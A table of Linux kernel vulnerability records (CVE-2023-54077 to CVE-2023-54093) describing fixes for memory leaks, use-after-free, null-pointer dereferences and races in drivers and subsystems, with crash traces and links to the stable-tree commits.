| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix memory leak if ntfs_read_mft failed Label ATTR_ROOT in ntfs_read_mft() sets is_root = true and ni->ni_flags |= NI_FLAG_DIR, then next attr will goto label ATTR_ALLOC and alloc ni->dir.alloc_run. However two states are not always consistent and can make memory leak. 1) attr_name in ATTR_ROOT does not fit the condition it will set is_root = true but NI_FLAG_DIR is not set. 2) next attr_name in ATTR_ALLOC fits the condition and alloc ni->dir.alloc_run 3) in cleanup function ni_clear(), when NI_FLAG_DIR is set, it frees ni->dir.alloc_run, otherwise it frees ni->file.run 4) because NI_FLAG_DIR is not set in this case, ni->dir.alloc_run is leaked as kmemleak reported: unreferenced object 0xffff888003bc5480 (size 64): backtrace: [<000000003d42e6b0>] __kmalloc_node+0x4e/0x1c0 [<00000000d8e19b8a>] kvmalloc_node+0x39/0x1f0 [<00000000fc3eb5b8>] run_add_entry+0x18a/0xa40 [ntfs3] [<0000000011c9f978>] run_unpack+0x75d/0x8e0 [ntfs3] [<00000000e7cf1819>] run_unpack_ex+0xbc/0x500 [ntfs3] [<00000000bbf0a43d>] ntfs_iget5+0xb25/0x2dd0 [ntfs3] [<00000000a6e50693>] ntfs_fill_super+0x218d/0x3580 [ntfs3] [<00000000b9170608>] get_tree_bdev+0x3fb/0x710 [<000000004833798a>] vfs_get_tree+0x8e/0x280 [<000000006e20b8e6>] path_mount+0xf3c/0x1930 [<000000007bf15a5f>] do_mount+0xf3/0x110 ... Fix this by always setting is_root and NI_FLAG_DIR together. | 2025-12-24 | not yet calculated | CVE-2023-54077 | https://git.kernel.org/stable/c/3030f2b9b3329db3948c1a145a5493ca6f617d50 https://git.kernel.org/stable/c/1bc6bb657dfb0ab3b94ef6d477ca241bf7b6ec06 https://git.kernel.org/stable/c/93bf79f989688852deade1550fb478b0a4d8daa8 https://git.kernel.org/stable/c/3bb0d3eb475f01744ce6d6e998dfbd80220852a1 https://git.kernel.org/stable/c/bfa434c60157c9793e9b12c9b68ade02aff9f803 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: max9286: Free control handler The control handler is leaked in some probe-time error paths, as well as in the remove path. Fix it. | 2025-12-24 | not yet calculated | CVE-2023-54078 | https://git.kernel.org/stable/c/9a3a907cf69f804eb41ece5c079720d1a6a15aa1 https://git.kernel.org/stable/c/1ad4b8c4552b4096dfc86531462dc1899f96af94 https://git.kernel.org/stable/c/1e9fc6c473210138eff3425a6136f0a9bf4eb0ae https://git.kernel.org/stable/c/0f25f99dacc72bce7d4128f7a254b23f1a343cc7 https://git.kernel.org/stable/c/19f36204dbe28bf4ec0149e87e9996a56af4e654 https://git.kernel.org/stable/c/bfce6a12e5ba1edde95126aa06778027f16115d4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: bq27xxx: Fix poll_interval handling and races on remove Before this patch bq27xxx_battery_teardown() was setting poll_interval = 0 to avoid bq27xxx_battery_update() requeuing the delayed_work item. There are 2 problems with this: 1. If the driver is unbound through sysfs, rather then the module being rmmod-ed, this changes poll_interval unexpectedly 2. This is racy, after it being set poll_interval could be changed before bq27xxx_battery_update() checks it through /sys/module/bq27xxx_battery/parameters/poll_interval Fix this by added a removed attribute to struct bq27xxx_device_info and using that instead of setting poll_interval to 0. There also is another poll_interval related race on remove(), writing /sys/module/bq27xxx_battery/parameters/poll_interval will requeue the delayed_work item for all devices on the bq27xxx_battery_devices list and the device being removed was only removed from that list after cancelling the delayed_work item. Fix this by moving the removal from the bq27xxx_battery_devices list to before cancelling the delayed_work item. | 2025-12-24 | not yet calculated | CVE-2023-54079 | https://git.kernel.org/stable/c/4c9615474fb0a41cfad658d78db3c9ec70912969 https://git.kernel.org/stable/c/465d919151a1e8d40daf366b868914f59d073211 https://git.kernel.org/stable/c/0c5f4cec759679c290720fbcf6bb81768e21c95b https://git.kernel.org/stable/c/e85757da9091998276ff21a13915ac25229cc232 https://git.kernel.org/stable/c/e98e5bebfcafc75a7b41192a607dfea5c1268afa https://git.kernel.org/stable/c/d952a1eaafcc5f0351caad5dbe9b5b3300d1d529 https://git.kernel.org/stable/c/b12faeca0e819ea09051a705fef9df7ea7e9e18c https://git.kernel.org/stable/c/c00bc80462afc7963f449d7f21d896d2f629cacc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: zoned: skip splitting and logical rewriting on pre-alloc write When doing a relocation, there is a chance that at the time of btrfs_reloc_clone_csums(), there is no checksum for the corresponding region. In this case, btrfs_finish_ordered_zoned()'s sum points to an invalid item and so ordered_extent's logical is set to some invalid value. Then, btrfs_lookup_block_group() in btrfs_zone_finish_endio() failed to find a block group and will hit an assert or a null pointer dereference as following. This can be reprodcued by running btrfs/028 several times (e.g, 4 to 16 times) with a null_blk setup. The device's zone size and capacity is set to 32 MB and the storage size is set to 5 GB on my setup. KASAN: null-ptr-deref in range [0x0000000000000088-0x000000000000008f] CPU: 6 PID: 3105720 Comm: kworker/u16:13 Tainted: G W 6.5.0-rc6-kts+ #1 Hardware name: Supermicro Super Server/X10SRL-F, BIOS 2.0 12/17/2015 Workqueue: btrfs-endio-write btrfs_work_helper [btrfs] RIP: 0010:btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs] Code: 41 54 49 89 fc 55 48 89 f5 53 e8 57 7d fc ff 48 8d b8 88 00 00 00 48 89 c3 48 b8 00 00 00 00 00 > 3c 02 00 0f 85 02 01 00 00 f6 83 88 00 00 00 01 0f 84 a8 00 00 RSP: 0018:ffff88833cf87b08 EFLAGS: 00010206 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000011 RSI: 0000000000000004 RDI: 0000000000000088 RBP: 0000000000000002 R08: 0000000000000001 R09: ffffed102877b827 R10: ffff888143bdc13b R11: ffff888125b1cbc0 R12: ffff888143bdc000 R13: 0000000000007000 R14: ffff888125b1cba8 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff88881e500000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f3ed85223d5 CR3: 00000001519b4005 CR4: 00000000001706e0 Call Trace: <TASK> ? die_addr+0x3c/0xa0 ? exc_general_protection+0x148/0x220 ? asm_exc_general_protection+0x22/0x30 ? btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs] ? btrfs_zone_finish_endio.part.0+0x19/0x160 [btrfs] btrfs_finish_one_ordered+0x7b8/0x1de0 [btrfs] ? rcu_is_watching+0x11/0xb0 ? lock_release+0x47a/0x620 ? btrfs_finish_ordered_zoned+0x59b/0x800 [btrfs] ? __pfx_btrfs_finish_one_ordered+0x10/0x10 [btrfs] ? btrfs_finish_ordered_zoned+0x358/0x800 [btrfs] ? __smp_call_single_queue+0x124/0x350 ? rcu_is_watching+0x11/0xb0 btrfs_work_helper+0x19f/0xc60 [btrfs] ? __pfx_try_to_wake_up+0x10/0x10 ? _raw_spin_unlock_irq+0x24/0x50 ? rcu_is_watching+0x11/0xb0 process_one_work+0x8c1/0x1430 ? __pfx_lock_acquire+0x10/0x10 ? __pfx_process_one_work+0x10/0x10 ? __pfx_do_raw_spin_lock+0x10/0x10 ? _raw_spin_lock_irq+0x52/0x60 worker_thread+0x100/0x12c0 ? __kthread_parkme+0xc1/0x1f0 ? __pfx_worker_thread+0x10/0x10 kthread+0x2ea/0x3c0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x30/0x70 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> On the zoned mode, writing to pre-allocated region means data relocation write. Such write always uses WRITE command so there is no need of splitting and rewriting logical address. Thus, we can just skip the function for the case. | 2025-12-24 | not yet calculated | CVE-2023-54080 | https://git.kernel.org/stable/c/d3cfa44164688a076e8b476cafb5df87d07cfa63 https://git.kernel.org/stable/c/c02d35d89b317994bd713ba82e160c5e7f22d9c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xen: speed up grant-table reclaim When a grant entry is still in use by the remote domain, Linux must put it on a deferred list. Normally, this list is very short, because the PV network and block protocols expect the backend to unmap the grant first. However, Qubes OS's GUI protocol is subject to the constraints of the X Window System, and as such winds up with the frontend unmapping the window first. As a result, the list can grow very large, resulting in a massive memory leak and eventual VM freeze. To partially solve this problem, make the number of entries that the VM will attempt to free at each iteration tunable. The default is still 10, but it can be overridden via a module parameter. This is Cc: stable because (when combined with appropriate userspace changes) it fixes a severe performance and stability problem for Qubes OS users. | 2025-12-24 | not yet calculated | CVE-2023-54081 | https://git.kernel.org/stable/c/cd1a8952ff529adc210e62306849fd6f256608c0 https://git.kernel.org/stable/c/c76d96c555895ac602c1587b001e5cf656abc371 https://git.kernel.org/stable/c/c04e9894846c663f3278a414f34416e6e45bbe68 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix null-ptr-deref in unix_stream_sendpage(). Bing-Jhong Billy Jheng reported null-ptr-deref in unix_stream_sendpage() with detailed analysis and a nice repro. unix_stream_sendpage() tries to add data to the last skb in the peer's recv queue without locking the queue. If the peer's FD is passed to another socket and the socket's FD is passed to the peer, there is a loop between them. If we close both sockets without receiving FD, the sockets will be cleaned up by garbage collection. The garbage collection iterates such sockets and unlinks skb with FD from the socket's receive queue under the queue's lock. So, there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free. To avoid the issue, unix_stream_sendpage() must lock the peer's recv queue. Note the issue does not exist in 6.5+ thanks to the recent sendpage() refactoring. This patch is originally written by Linus Torvalds. BUG: unable to handle page fault for address: ffff988004dd6870 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 0 P4D 0 PREEMPT SMP PTI CPU: 4 PID: 297 Comm: garbage_uaf Not tainted 6.1.46 #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:kmem_cache_alloc_node+0xa2/0x1e0 Code: c0 0f 84 32 01 00 00 41 83 fd ff 74 10 48 8b 00 48 c1 e8 3a 41 39 c5 0f 85 1c 01 00 00 41 8b 44 24 28 49 8b 3c 24 48 8d 4a 40 <49> 8b 1c 06 4c 89 f0 65 48 0f c7 0f 0f 94 c0 84 c0 74 a1 41 8b 44 RSP: 0018:ffffc9000079fac0 EFLAGS: 00000246 RAX: 0000000000000070 RBX: 0000000000000005 RCX: 000000000001a284 RDX: 000000000001a244 RSI: 0000000000400cc0 RDI: 000000000002eee0 RBP: 0000000000400cc0 R08: 0000000000400cc0 R09: 0000000000000003 R10: 0000000000000001 R11: 0000000000000000 R12: ffff888003970f00 R13: 00000000ffffffff R14: ffff988004dd6800 R15: 00000000000000e8 FS: 00007f174d6f3600(0000) GS:ffff88807db00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff988004dd6870 CR3: 00000000092be000 CR4: 00000000007506e0 PKRU: 55555554 Call Trace: <TASK> ? __die_body.cold+0x1a/0x1f ? page_fault_oops+0xa9/0x1e0 ? fixup_exception+0x1d/0x310 ? exc_page_fault+0xa8/0x150 ? asm_exc_page_fault+0x22/0x30 ? kmem_cache_alloc_node+0xa2/0x1e0 ? __alloc_skb+0x16c/0x1e0 __alloc_skb+0x16c/0x1e0 alloc_skb_with_frags+0x48/0x1e0 sock_alloc_send_pskb+0x234/0x270 unix_stream_sendmsg+0x1f5/0x690 sock_sendmsg+0x5d/0x60 ____sys_sendmsg+0x210/0x260 ___sys_sendmsg+0x83/0xd0 ? kmem_cache_alloc+0xc6/0x1c0 ? avc_disable+0x20/0x20 ? percpu_counter_add_batch+0x53/0xc0 ? alloc_empty_file+0x5d/0xb0 ? alloc_file+0x91/0x170 ? alloc_file_pseudo+0x94/0x100 ? __fget_light+0x9f/0x120 __sys_sendmsg+0x54/0xa0 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x69/0xd3 RIP: 0033:0x7f174d639a7d Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 8a c1 f4 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 de c1 f4 ff 48 RSP: 002b:00007ffcb563ea50 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f174d639a7d RDX: 0000000000000000 RSI: 00007ffcb563eab0 RDI: 0000000000000007 RBP: 00007ffcb563eb10 R08: 0000000000000000 R09: 00000000ffffffff R10: 00000000004040a0 R11: 0000000000000293 R12: 00007ffcb563ec28 R13: 0000000000401398 R14: 0000000000403e00 R15: 00007f174d72c000 </TASK> | 2025-12-24 | not yet calculated | CVE-2023-54082 | https://git.kernel.org/stable/c/c080cee930303124624fe64fc504f66c815ee6b9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: phy: tegra: xusb: Clear the driver reference in usb-phy dev For the dual-role port, it will assign the phy dev to usb-phy dev and use the port dev driver as the dev driver of usb-phy. When we try to destroy the port dev, it will destroy its dev driver as well. But we did not remove the reference from usb-phy dev. This might cause the use-after-free issue in KASAN. | 2025-12-24 | not yet calculated | CVE-2023-54083 | https://git.kernel.org/stable/c/b6a107c52073496d2e5d2837915f59fb3103832f https://git.kernel.org/stable/c/b84998a407a882991916b1a61d987c400d8a0ce6 https://git.kernel.org/stable/c/238edc04ddb9d272b38f5419bcd419ad3b92b91b https://git.kernel.org/stable/c/82187460347ad58fd6b06d2883da73c3f2df9631 https://git.kernel.org/stable/c/c0c2fcb1325d0d4f3b322b5ee49385f8eca2560d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: firewire-digi00x: prevent potential use after free This code was supposed to return an error code if init_stream() failed, but it instead freed dg00x->rx_stream and returned success. This potentially leads to a use after free. | 2025-12-24 | not yet calculated | CVE-2023-54084 | https://git.kernel.org/stable/c/5009aead17f060753428e249eb0246eb1c2f8b86 https://git.kernel.org/stable/c/13c5fa1248bf06e95a25907c1be83948b8c44c50 https://git.kernel.org/stable/c/bbb5ac533ca6c4e2775a95388c9c0c610bb442b7 https://git.kernel.org/stable/c/ee1a221d947809c0308f27567c07a3ac93406057 https://git.kernel.org/stable/c/67148395efa2c1fb20e98fca359b20e7a6c81fe4 https://git.kernel.org/stable/c/c0e72058d5e21982e61a29de6b098f7c1f0db498 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix NULL pointer dereference on fastopen early fallback In case of early fallback to TCP, subflow_syn_recv_sock() deletes the subflow context before returning the newly allocated sock to the caller. The fastopen path does not cope with the above unconditionally dereferencing the subflow context. | 2025-12-24 | not yet calculated | CVE-2023-54085 | https://git.kernel.org/stable/c/95135835519b0ab931c39908b2c99e9fb3c9068b https://git.kernel.org/stable/c/c0ff6f6da66a7791a32c0234388b1bdc00244917 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Add preempt_count_{sub,add} into btf id deny list The recursion check in __bpf_prog_enter* and __bpf_prog_exit* leave preempt_count_{sub,add} unprotected. When attaching trampoline to them we get panic as follows, [ 867.843050] BUG: TASK stack guard page was hit at 0000000009d325cf (stack is 0000000046a46a15..00000000537e7b28) [ 867.843064] stack guard page: 0000 [#1] PREEMPT SMP NOPTI [ 867.843067] CPU: 8 PID: 11009 Comm: trace Kdump: loaded Not tainted 6.2.0+ #4 [ 867.843100] Call Trace: [ 867.843101] <TASK> [ 867.843104] asm_exc_int3+0x3a/0x40 [ 867.843108] RIP: 0010:preempt_count_sub+0x1/0xa0 [ 867.843135] __bpf_prog_enter_recur+0x17/0x90 [ 867.843148] bpf_trampoline_6442468108_0+0x2e/0x1000 [ 867.843154] ? preempt_count_sub+0x1/0xa0 [ 867.843157] preempt_count_sub+0x5/0xa0 [ 867.843159] ? migrate_enable+0xac/0xf0 [ 867.843164] __bpf_prog_exit_recur+0x2d/0x40 [ 867.843168] bpf_trampoline_6442468108_0+0x55/0x1000 ... [ 867.843788] preempt_count_sub+0x5/0xa0 [ 867.843793] ? migrate_enable+0xac/0xf0 [ 867.843829] __bpf_prog_exit_recur+0x2d/0x40 [ 867.843837] BUG: IRQ stack guard page was hit at 0000000099bd8228 (stack is 00000000b23e2bc4..000000006d95af35) [ 867.843841] BUG: IRQ stack guard page was hit at 000000005ae07924 (stack is 00000000ffd69623..0000000014eb594c) [ 867.843843] BUG: IRQ stack guard page was hit at 00000000028320f0 (stack is 00000000034b6438..0000000078d1bcec) [ 867.843842] bpf_trampoline_6442468108_0+0x55/0x1000 ... That is because in __bpf_prog_exit_recur, the preempt_count_{sub,add} are called after prog->active is decreased. Fixing this by adding these two functions into btf ids deny list. | 2025-12-24 | not yet calculated | CVE-2023-54086 | https://git.kernel.org/stable/c/095018267c87b8bfbbb12eeb1c0ebf2359e1782c https://git.kernel.org/stable/c/60039bf72f81638baa28652a11a68e9b0b7b5b2d https://git.kernel.org/stable/c/b9168d41b83d182f34ba927ee822edaee18d5fc8 https://git.kernel.org/stable/c/c11bd046485d7bf1ca200db0e7d0bdc4bafdd395 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ubi: Fix possible null-ptr-deref in ubi_free_volume() It willl cause null-ptr-deref in the following case: uif_init() ubi_add_volume() cdev_add() -> if it fails, call kill_volumes() device_register() kill_volumes() -> if ubi_add_volume() fails call this function ubi_free_volume() cdev_del() device_unregister() -> trying to delete a not added device, it causes null-ptr-deref So in ubi_free_volume(), it delete devices whether they are added or not, it will causes null-ptr-deref. Handle the error case whlie calling ubi_add_volume() to fix this problem. If add volume fails, set the corresponding vol to null, so it can not be accessed in kill_volumes() and release the resource in ubi_add_volume() error path. | 2025-12-24 | not yet calculated | CVE-2023-54087 | https://git.kernel.org/stable/c/5558bcf1c58720ca6e9d6198d921cb3aa337f038 https://git.kernel.org/stable/c/45b2c5ca4d2edae70f19fdb086bd927840c4c309 https://git.kernel.org/stable/c/234c53e57424992e657e6f4acc00d3df0983176f https://git.kernel.org/stable/c/fcbc795abe7897da4b5d2a6ab5010e36774b00c2 https://git.kernel.org/stable/c/5ec4c8aca5a221756a9007deadfea92795319fee https://git.kernel.org/stable/c/2ea7195b195009ecf0046e55361f393ba96d02db https://git.kernel.org/stable/c/9eccdb0760cbcb4427b5303a83a3007de998af51 https://git.kernel.org/stable/c/c15859bfd326c10230f09cb48a17f8a35f190342 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: hold queue_lock when removing blkg->q_node When blkg is removed from q->blkg_list from blkg_free_workfn(), queue_lock has to be held, otherwise, all kinds of bugs(list corruption, hard lockup, ..) can be triggered from blkg_destroy_all(). | 2025-12-24 | not yet calculated | CVE-2023-54088 | https://git.kernel.org/stable/c/b5dae1cd0d8368b4338430ff93403df67f0b8bcc https://git.kernel.org/stable/c/083b58373463a6e5ee60ecb135269348f68ad7df https://git.kernel.org/stable/c/cd4ffdf56791eec95af01f06bee1ec7665ca75c4 https://git.kernel.org/stable/c/c164c7bc9775be7bcc68754bb3431fce5823822e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio_pmem: add the missing REQ_OP_WRITE for flush bio When doing mkfs.xfs on a pmem device, the following warning was ------------[ cut here ]------------ WARNING: CPU: 2 PID: 384 at block/blk-core.c:751 submit_bio_noacct Modules linked in: CPU: 2 PID: 384 Comm: mkfs.xfs Not tainted 6.4.0-rc7+ #154 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) RIP: 0010:submit_bio_noacct+0x340/0x520 ...... Call Trace: <TASK> ? submit_bio_noacct+0xd5/0x520 submit_bio+0x37/0x60 async_pmem_flush+0x79/0xa0 nvdimm_flush+0x17/0x40 pmem_submit_bio+0x370/0x390 __submit_bio+0xbc/0x190 submit_bio_noacct_nocheck+0x14d/0x370 submit_bio_noacct+0x1ef/0x520 submit_bio+0x55/0x60 submit_bio_wait+0x5a/0xc0 blkdev_issue_flush+0x44/0x60 The root cause is that submit_bio_noacct() needs bio_op() is either WRITE or ZONE_APPEND for flush bio and async_pmem_flush() doesn't assign REQ_OP_WRITE when allocating flush bio, so submit_bio_noacct just fail the flush bio. Simply fix it by adding the missing REQ_OP_WRITE for flush bio. And we could fix the flush order issue and do flush optimization later. | 2025-12-24 | not yet calculated | CVE-2023-54089 | https://git.kernel.org/stable/c/e39e870e1e683a71d3d2e63e661a5695f60931a7 https://git.kernel.org/stable/c/c7ab7e45ccef209809f8c2b00f497deec06b29c0 https://git.kernel.org/stable/c/c1dbd8a849183b9c12d257ad3043ecec50db50b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ixgbe: Fix panic during XDP_TX with > 64 CPUs Commit 4fe815850bdc ("ixgbe: let the xdpdrv work with more than 64 cpus") adds support to allow XDP programs to run on systems with more than 64 CPUs by locking the XDP TX rings and indexing them using cpu % 64 (IXGBE_MAX_XDP_QS). Upon trying this out patch on a system with more than 64 cores, the kernel paniced with an array-index-out-of-bounds at the return in ixgbe_determine_xdp_ring in ixgbe.h, which means ixgbe_determine_xdp_q_idx was just returning the cpu instead of cpu % IXGBE_MAX_XDP_QS. An example splat: ========================================================================== UBSAN: array-index-out-of-bounds in /var/lib/dkms/ixgbe/5.18.6+focal-1/build/src/ixgbe.h:1147:26 index 65 is out of range for type 'ixgbe_ring *[64]' ========================================================================== BUG: kernel NULL pointer dereference, address: 0000000000000058 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] SMP NOPTI CPU: 65 PID: 408 Comm: ksoftirqd/65 Tainted: G IOE 5.15.0-48-generic #54~20.04.1-Ubuntu Hardware name: Dell Inc. PowerEdge R640/0W23H8, BIOS 2.5.4 01/13/2020 RIP: 0010:ixgbe_xmit_xdp_ring+0x1b/0x1c0 [ixgbe] Code: 3b 52 d4 cf e9 42 f2 ff ff 66 0f 1f 44 00 00 0f 1f 44 00 00 55 b9 00 00 00 00 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 08 <44> 0f b7 47 58 0f b7 47 5a 0f b7 57 54 44 0f b7 76 08 66 41 39 c0 RSP: 0018:ffffbc3fcd88fcb0 EFLAGS: 00010282 RAX: ffff92a253260980 RBX: ffffbc3fe68b00a0 RCX: 0000000000000000 RDX: ffff928b5f659000 RSI: ffff928b5f659000 RDI: 0000000000000000 RBP: ffffbc3fcd88fce0 R08: ffff92b9dfc20580 R09: 0000000000000001 R10: 3d3d3d3d3d3d3d3d R11: 3d3d3d3d3d3d3d3d R12: 0000000000000000 R13: ffff928b2f0fa8c0 R14: ffff928b9be20050 R15: 000000000000003c FS: 0000000000000000(0000) GS:ffff92b9dfc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000058 CR3: 000000011dd6a002 CR4: 00000000007706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: <TASK> ixgbe_poll+0x103e/0x1280 [ixgbe] ? sched_clock_cpu+0x12/0xe0 __napi_poll+0x30/0x160 net_rx_action+0x11c/0x270 __do_softirq+0xda/0x2ee run_ksoftirqd+0x2f/0x50 smpboot_thread_fn+0xb7/0x150 ? sort_range+0x30/0x30 kthread+0x127/0x150 ? set_kthread_struct+0x50/0x50 ret_from_fork+0x1f/0x30 </TASK> I think this is how it happens: Upon loading the first XDP program on a system with more than 64 CPUs, ixgbe_xdp_locking_key is incremented in ixgbe_xdp_setup. However, immediately after this, the rings are reconfigured by ixgbe_setup_tc. ixgbe_setup_tc calls ixgbe_clear_interrupt_scheme which calls ixgbe_free_q_vectors which calls ixgbe_free_q_vector in a loop. ixgbe_free_q_vector decrements ixgbe_xdp_locking_key once per call if it is non-zero. Commenting out the decrement in ixgbe_free_q_vector stopped my system from panicing. I suspect to make the original patch work, I would need to load an XDP program and then replace it in order to get ixgbe_xdp_locking_key back above 0 since ixgbe_setup_tc is only called when transitioning between XDP and non-XDP ring configurations, while ixgbe_xdp_locking_key is incremented every time ixgbe_xdp_setup is called. Also, ixgbe_setup_tc can be called via ethtool --set-channels, so this becomes another path to decrement ixgbe_xdp_locking_key to 0 on systems with more than 64 CPUs. Since ixgbe_xdp_locking_key only protects the XDP_TX path and is tied to the number of CPUs present, there is no reason to disable it upon unloading an XDP program. To avoid confusion, I have moved enabling ixgbe_xdp_locking_key into ixgbe_sw_init, which is part of the probe path. | 2025-12-24 | not yet calculated | CVE-2023-54090 | https://git.kernel.org/stable/c/1924450175349e64f8dfc3689efcb653dba0418e https://git.kernel.org/stable/c/785b2b5b47b1aa4c31862948b312ea845401c5ec https://git.kernel.org/stable/c/4cd43a19900d0b98c1ec4bb6984763369d2e19ec https://git.kernel.org/stable/c/c23ae5091a8b3e50fe755257df020907e7c029bb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/client: Fix memory leak in drm_client_target_cloned dmt_mode is allocated and never freed in this function. It was found with the ast driver, but most drivers using generic fbdev setup are probably affected. This fixes the following kmemleak report: backtrace: [<00000000b391296d>] drm_mode_duplicate+0x45/0x220 [drm] [<00000000e45bb5b3>] drm_client_target_cloned.constprop.0+0x27b/0x480 [drm] [<00000000ed2d3a37>] drm_client_modeset_probe+0x6bd/0xf50 [drm] [<0000000010e5cc9d>] __drm_fb_helper_initial_config_and_unlock+0xb4/0x2c0 [drm_kms_helper] [<00000000909f82ca>] drm_fbdev_client_hotplug+0x2bc/0x4d0 [drm_kms_helper] [<00000000063a69aa>] drm_client_register+0x169/0x240 [drm] [<00000000a8c61525>] ast_pci_probe+0x142/0x190 [ast] [<00000000987f19bb>] local_pci_probe+0xdc/0x180 [<000000004fca231b>] work_for_cpu_fn+0x4e/0xa0 [<0000000000b85301>] process_one_work+0x8b7/0x1540 [<000000003375b17c>] worker_thread+0x70a/0xed0 [<00000000b0d43cd9>] kthread+0x29f/0x340 [<000000008d770833>] ret_from_fork+0x1f/0x30 unreferenced object 0xff11000333089a00 (size 128): | 2025-12-24 | not yet calculated | CVE-2023-54091 | https://git.kernel.org/stable/c/d3009700f48602b557eade1f22c98b6bc20247e8 https://git.kernel.org/stable/c/a4b978249e8fa94956fce8b70a709f7797716f62 https://git.kernel.org/stable/c/52daf6ba2e0d201640cb1ce42049c5c4426b4d6e https://git.kernel.org/stable/c/105275879a80503686a8108af2f5c579a1c5aef4 https://git.kernel.org/stable/c/a85e23a1ef63e45a18f0a30d7816fcb4a865ca95 https://git.kernel.org/stable/c/b5359d7a5087ac398fc429da6833133b4784c268 https://git.kernel.org/stable/c/4b596a6e2d2e0f9c14e4122506dd715f43fcd727 https://git.kernel.org/stable/c/c2a88e8bdf5f6239948d75283d0ae7e0c7945b03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: s390: pv: fix index value of replaced ASCE The index field of the struct page corresponding to a guest ASCE should be 0. When replacing the ASCE in s390_replace_asce(), the index of the new ASCE should also be set to 0. Having the wrong index might lead to the wrong addresses being passed around when notifying pte invalidations, and eventually to validity intercepts (VM crash) if the prefix gets unmapped and the notifier gets called with the wrong address. | 2025-12-24 | not yet calculated | CVE-2023-54092 | https://git.kernel.org/stable/c/8e635da0e0d3cb45e32fa79b36218fb98281bc10 https://git.kernel.org/stable/c/49a2686adddebe1ae76b4d368383208656ef6606 https://git.kernel.org/stable/c/017f686bcb536ff23d49c143fdf9d1fd89a9a924 https://git.kernel.org/stable/c/f1c7a776338f2ac5e34da40e58fe9f33ea390a5e https://git.kernel.org/stable/c/c2fceb59bbda16468bda82b002383bff59de89ab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: anysee: fix null-ptr-deref in anysee_master_xfer In anysee_master_xfer, msg is controlled by user. When msg[i].buf is null and msg[i].len is zero, former checks on msg[i].buf would be passed. Malicious data finally reach anysee_master_xfer. If accessing msg[i].buf[0] without sanity check, null ptr deref would happen. We add check on msg[i].len to prevent crash. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") [hverkuil: add spaces around +] | 2025-12-24 | not yet calculated | CVE-2023-54093 | https://git.kernel.org/stable/c/73c0b224ceeba12dee2a7a8cbc147648da0b2e63 https://git.kernel.org/stable/c/e04affec2506ff5c12a18d78d7e694b3556a8982 https://git.kernel.org/stable/c/8dc5b370254abc10f0cb4141d90cecf7ce465472 https://git.kernel.org/stable/c/4a9763d2bc4a6d6fab42555b9c0b2eefa32585ac https://git.kernel.org/stable/c/3dd5846a873938ec7b6d404ec27662942cd8f2ef https://git.kernel.org/stable/c/14b94154a72388b57221a2a73795c0ea61a95373 https://git.kernel.org/stable/c/5975dbbb7ad0767eaabd15d2c37a739ac76acb00 https://git.kernel.org/stable/c/c30411266fd67ea3c02a05c157231654d5a3bdc9 |
